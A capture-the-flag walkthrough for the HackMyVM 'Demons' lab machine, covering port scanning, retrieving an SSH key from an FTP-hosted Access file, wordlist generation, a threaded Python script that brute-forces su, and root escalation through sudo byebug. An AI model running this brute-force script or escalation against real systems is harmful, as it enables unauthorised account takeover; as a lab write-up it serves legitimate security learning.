HackMyVm Demons Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Demons

Find the IP of the machine.

 ~ sudo arp-scan --interface eth1 192.168.56.0/24                            
 ...
 192.168.56.218  08:00:27:71:4c:b6       PCS Systemtechnik GmbH

Scan ports.

~ nmap -sV -sC -p- 192.168.56.218  -oN ports.log  
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-21 08:42 CST
 Nmap scan report for 192.168.56.218
 Host is up (0.00090s latency).
 Not shown: 65532 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |      Connected to 192.168.56.150
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 2
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 5e:44:8a:b1:77:0c:42:79:16:64:8d:af:b4:78:bb:b4 (RSA)
 |   256 cb:0f:a7:df:7f:23:78:5a:08:e3:4f:b6:43:7c:11:84 (ECDSA)
 |_  256 a0:4a:26:bf:40:08:68:c2:b1:04:88:b4:8b:a2:45:2f (ED25519)
 80/tcp open  http    Apache httpd 2.4.48 ((Debian))
 |_http-server-header: Apache/2.4.48 (Debian)
 |_http-title:  DemonsCloseCall
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Log in to FTP as anonymous and download DemonsVBAMacroTools.mdb.

 ftp> cd .toolsHidden
 250 Directory successfully changed.
 ftp> ls -la
 200 PORT command successful. Consider using PASV.
 150 Here comes the directory listing.
 drwxrwxrwx    2 0        0            4096 Sep 16 15:17 .
 drwxr-xr-x    3 0        115          4096 Sep 16 15:18 ..
 -rw-r--r--    1 0        0              55 Sep 10 17:21 .what
 -rw-------    1 1000     1000        12018 Sep 10 17:19 DemonsCellsDogma.xlsx
 -rwxrwxrwx    1 1000     1000       339968 Sep 16 15:17 DemonsVBAMacroTools.mdb

Open it with Access; there is a VBA module which is password protected.

[image-20210923200140504.png]

Google the way to bypass the password. Then we can view the source code.

[image-20210923200334764.png]

Save the ssh key to key.txt.

Enumerate port 80. At http://ip/hell we get 2 usernames.

[image-20210923200603370.png]

Try login as aim with the private key.

 ~ ssh aim@192.168.56.218 -i key.txt      
 Last login: Tue Sep 21 04:52:35 2021 from 192.168.56.150
 aim@Demons:~$ id
 uid=1001(aim) gid=1001(aim) groups=1001(aim)

There is an image in /home/aim named key8_8.jpg. This is the hint for the password of another user, agares.

[image-20210923200722887.png]

Check the keyboard image: the keys "34odfnm" are marked differently. This means the dictionary contains only these 7 letters/numbers.

8_8 may mean the password length is 8, so we should use "crunch 8 8".

So, first we generate a dictionary with crunch, which contains 5764801 words (7^8).

 ~ crunch 8 8 dfnmo34 > tmp.txt                              
 0
 Crunch will now generate the following amount of data: 51883209 bytes
 49 MB
 0 GB
 0 TB
 0 PB
 Crunch will now generate the following number of lines: 5764801

Because the password contains all 7 letters/numbers, exactly one letter/number appears twice.

Then we use a script to make the dictionary smaller. (Thanks avijneyam#8394 for the script.)

```python
# Keep only the 8-character words in which exactly one symbol appears twice
# (all 7 symbols from the hint are used, so the remaining 6 appear once).
with open("tmp.txt") as f:
    lines = f.read().splitlines()

data = []

for line in lines:
    uline = list(set(line))  # distinct symbols in this word

    counts = []
    for char in uline:
        counts.append(line.count(char))
    counts.sort()

    # highest frequency is 2 and the next highest is 1
    if counts[-1] == 2 and counts[-2] == 1:
        data.append(line)

data = "\n".join(data)

with open("dic.txt", "w") as f1:
    f1.write(data)
```


The new dictionary contains only 141119 words. (Still a big one.)

```bash
 ~ wc -l dic.txt
 141119 dic.txt
```
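The same candidate set can be derived directly from the hint instead of filtering 5764801 crunch lines. The following is an added example, not the walkthrough's script: it computes the count in closed form (7 * 8! / 2 = 141120; wc -l shows 141119 only because the filter script writes no trailing newline) and generates the words with itertools. The alphabet "dfnmo34" and the length 8 are taken from the page.

```python
# Added example, not the walkthrough's own script: build the candidate set
# straight from the hint instead of generating 5764801 crunch lines and
# filtering them. Alphabet "dfnmo34" and length 8 are taken from the page.
from itertools import permutations
from math import factorial

ALPHABET = "dfnmo34"
LENGTH = 8


def count_candidates(alphabet: str, length: int) -> int:
    """Closed form: choose which symbol is doubled (7 ways), then arrange
    the 8 symbols; the two copies are indistinguishable, so divide by 2!."""
    if length != len(alphabet) + 1:
        raise ValueError("hint assumes every symbol used and exactly one doubled")
    return len(alphabet) * factorial(length) // 2


def matches_hint(word: str, alphabet: str) -> bool:
    """The page's filter stated directly: every symbol of the alphabet
    present, and the highest frequency is 2 with the next highest 1."""
    if len(word) != len(alphabet) + 1 or set(word) != set(alphabet):
        return False
    counts = sorted(word.count(c) for c in set(word))
    return counts[-1] == 2 and counts[-2] == 1


def generate_candidates(alphabet: str, length: int):
    """Yield each candidate exactly once: for each choice of doubled symbol,
    permute the multiset and drop the duplicate orderings."""
    for doubled in alphabet:
        seen = set()
        for perm in permutations(alphabet + doubled, length):
            word = "".join(perm)
            if word not in seen:
                seen.add(word)
                yield word


def build_wordlist(alphabet: str = ALPHABET, length: int = LENGTH) -> list:
    """Return the full list and check it against the closed-form count."""
    words = list(generate_candidates(alphabet, length))
    if len(words) != count_candidates(alphabet, length):
        raise RuntimeError("generator and closed form disagree")
    return words


if __name__ == "__main__":
    wordlist = build_wordlist()
    with open("dic.txt", "w") as out:
        out.write("\n".join(wordlist) + "\n")
    print(len(wordlist), "candidates written")
```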

Then we need to brute force su to get the right password of agares.

There is a tool named sucrack on GitHub.

https://github.com/hemp3l/sucrack

sucrack takes about 18 mins (with 100 threads; too many threads cause errors).

 aim@Demons:~$ time ./sucrack -a -w 100 -u agares dic.txt
 password is: xxxxxxxx

 real    18m19.760s
 user    11m7.012s
 sys     4m59.095s

We can also write a Python script to do the brute force, but it is much slower than sucrack.

```python
#!/usr/bin/python3
import threading
from subprocess import PIPE, STDOUT, Popen

threads = []
t_nums = 100  # number of threads

correct_pass = ""  # set by the first thread that finds the password
current = 0        # count of passwords tried so far (display only)
total = 0          # total count of passwords
lock = threading.Lock()

def crack_thread(*pass_list):
    # each thread tries its own slice of the wordlist against `su agares`
    global correct_pass, current
    for pwd in pass_list:
        if len(correct_pass) > 0:  # another thread already found it, exit
            return
        with lock:
            current += 1
            print(f"{current}/{total}", end="\r")
        p = Popen(['su', 'agares'], stdin=PIPE, stdout=PIPE, stderr=STDOUT)
        try:
            # su reads the password from stdin; on success the shell runs `id`
            out, _ = p.communicate(f"{pwd}\nid\n".encode("utf-8"))
        except Exception:
            p.kill()
            continue
        if b"agares" in out:  # `id` ran as agares, so the password was right
            print(f"\nPassword is {pwd}\n")
            correct_pass = pwd
            return

with open('mini.txt', 'r') as passfile:
    # strip the trailing newline, otherwise it is sent to su as part of the input
    passes = [line.strip() for line in passfile if line.strip()]
total = len(passes)

t_size = total // t_nums  # passwords count of each thread
t_last = total % t_nums   # if mod is not 0, there will be another thread

for i in range(t_nums):
    passblk = passes[i*t_size:(i+1)*t_size]
    threads.append(threading.Thread(target=crack_thread, args=passblk))
if t_last > 0:
    passblk = passes[t_size*t_nums:]
    threads.append(threading.Thread(target=crack_thread, args=passblk))
for t in threads:
    t.daemon = True
    t.start()
for t in threads:
    t.join()
```

aim@Demons:~$ time python3 mt.py
126758/141120
Password is xxxxxxxx

real 185m22.898s
user 98m29.009s
sys 62m7.093s

Check sudo -l as user agares.

agares@Demons:/home/aim$ sudo -l
[sudo] password di agares:
Corrispondenza voci Defaults per agares su Demons:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
L'utente agares può eseguire i seguenti comandi su Demons:
    (ALL : ALL) /bin/byebug

It's easy to get root now.

agares@Demons:~$ echo 'system("/bin/sh")' > tmp.rb
agares@Demons:~$ sudo byebug tmp.rb

[1, 1] in /home/agares/tmp.rb                     
=> 1: system("/bin/sh")
(byebug) continue
# id;hostname
uid=0(root) gid=0(root) gruppi=0(root)
Demons
